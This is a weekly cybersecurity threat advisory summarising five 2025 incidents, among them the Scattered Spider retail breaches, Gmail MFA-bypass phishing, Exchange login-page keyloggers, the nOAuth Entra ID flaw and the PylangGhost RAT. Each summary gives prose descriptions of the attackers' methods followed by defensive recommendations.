Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach

 

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include:

  • Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach
  • Russian State-Backed Hackers Bypass Gmail MFA Using App-Specific Passwords in Sophisticated Phishing Campaign
  • Credential Theft Campaign Abuses Unpatched Microsoft Exchange Servers
  • Widespread nOAuth Vulnerability in Entra ID Exposes Thousands of SaaS Applications to Account Takeovers
  • PylangGhost RAT Analysis: North Korean APT Expands Multi-Platform Malware Arsenal


These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

 

1. Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach

In April 2025, Marks & Spencer and Co-op faced coordinated cyberattacks now confirmed as a single, systemic event by the UK’s Cyber Monitoring Centre. Linked to the financially motivated group Scattered Spider, the attacks caused an estimated £270–£440 million in damage. The group exploited social engineering, posing as IT support to bypass help desk security and gain access via SIM swapping, phishing, and vishing. They later deployed ALPHV ransomware, used tools like Cobalt Strike and AnyDesk for persistence, and exfiltrated data through stealthy channels like Rclone and Plink. To defend against such advanced threats, organizations must tighten help desk protocols, enforce hardware-based MFA, and train employees against phishing and smishing. Deploying EDR/XDR, segmenting networks using Zero Trust, monitoring for abuse of legitimate tools, and maintaining credential hygiene are critical. Additionally, vendors like TCS must be included in risk assessments to avoid becoming unintentional attack surfaces. This case underscores the urgency of layered, proactive defense.

2. Hackers Bypass MFA Using App-Specific Passwords in Phishing Campaign

Between April and June 2025, Russian state-linked hackers (UNC6293), likely tied to APT29, launched highly targeted phishing campaigns aimed at bypassing Gmail’s multi-factor authentication. By impersonating U.S. State Department officials using fake personas and spoofed CC addresses, they tricked academics and foreign policy critics into creating and sharing app-specific passwords, granting attackers full Gmail access. This low-pressure, highly personalized approach relied on social engineering, convincing victims to enroll in a fake “MS DoS Guest Tenant” platform using a PDF guide. Attackers then used residential proxies and VPS infrastructure to mask their activity. To defend against such threats, users, especially high-risk profiles, should enroll in Advanced Protection Programs, which disable app-specific passwords and enforce security keys. Organizations using Google Workspace should block these passwords through admin settings. It is critical to educate users on slow-burn phishing tactics, monitor account activity for unusual logins, and enforce conditional access policies to restrict logins by location or IP.

 

3. Credential Theft Campaign Abuses Unpatched Microsoft Exchange Servers

Threat actors are actively targeting unpatched Microsoft Exchange servers by injecting JavaScript-based keyloggers into login pages, capturing credentials and exfiltrating them through Telegram bots or DNS tunnels. These attacks exploit well-known vulnerabilities like ProxyShell and ProxyLogon, with incidents reported across more than 26 countries. The JavaScript is stealthily embedded into the Outlook Web App login interface, allowing it to operate undetected while harvesting user credentials, cookies, user agents, and timestamps. In some variants, the stolen data is stored locally on the compromised server, while others transmit it via outbound XHR requests or covert DNS tunnels. To counter this, organizations should immediately patch all Exchange servers, particularly those exposed to the internet. Regular audits of login pages and authentication file integrity are essential, along with scanning for unauthorized code injections. Using network security tools to flag abnormal behavior, implementing web application firewalls, and limiting server exposure through VPNs or reverse proxies are critical steps in defense.

 

4. Vulnerability in Entra ID Exposes Thousands of SaaS Applications to Account Takeovers

Over 15,000 SaaS applications remain vulnerable to a critical Microsoft Entra ID flaw known as nOAuth, which allows account takeovers by exploiting unverified email claims. Despite being disclosed in 2023, the issue persists due to insecure OpenID Connect (OIDC) implementations where apps wrongly trust the email claim instead of using the more secure sub and iss claims. This enables attackers to register a fake Entra tenant, spoof a victim’s email, and bypass MFA, conditional access, and Zero Trust policies entirely by logging in via “Sign in with Microsoft.” The vulnerability is difficult to detect and trivial to exploit. To mitigate risk, SaaS vendors must stop using email as a unique identifier and follow Microsoft’s nOAuth mitigation guidance. Code audits are necessary to fix flawed OIDC logic, and teams must enforce identity verification before access is granted. Continuous log correlation and training for DevOps and identity teams will further strengthen protection against impersonation.

 

5. PylangGhost RAT Analysis: North Korean APT Expands Multi-Platform Malware Arsenal

Cybersecurity researchers have uncovered PylangGhost, a new Python-based Remote Access Trojan (RAT) deployed by North Korean-aligned threat group Famous Chollima. Targeting Windows users in the cryptocurrency and blockchain sectors, the malware is delivered through fake job interviews impersonating companies like Coinbase and Uniswap. Victims are lured to spoofed sites, prompted to install fake video drivers, and unknowingly run PowerShell commands that deploy the malware. Once active, PylangGhost establishes persistence, extracts credentials from over 80 browser extensions, and communicates with its command server via unencrypted HTTP using RC4 encryption. The campaign exclusively targets Windows systems, while older variants target macOS. To defend against this threat, organizations must block unknown PowerShell execution, monitor for suspicious registry changes, and flag unusual Python activity. Network security tools should inspect HTTP traffic for encrypted payloads and block access to malicious domains. Equally important is educating users about fake recruitment lures and the dangers of running unknown scripts.

 

 

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.

SISA’s Latest
close slider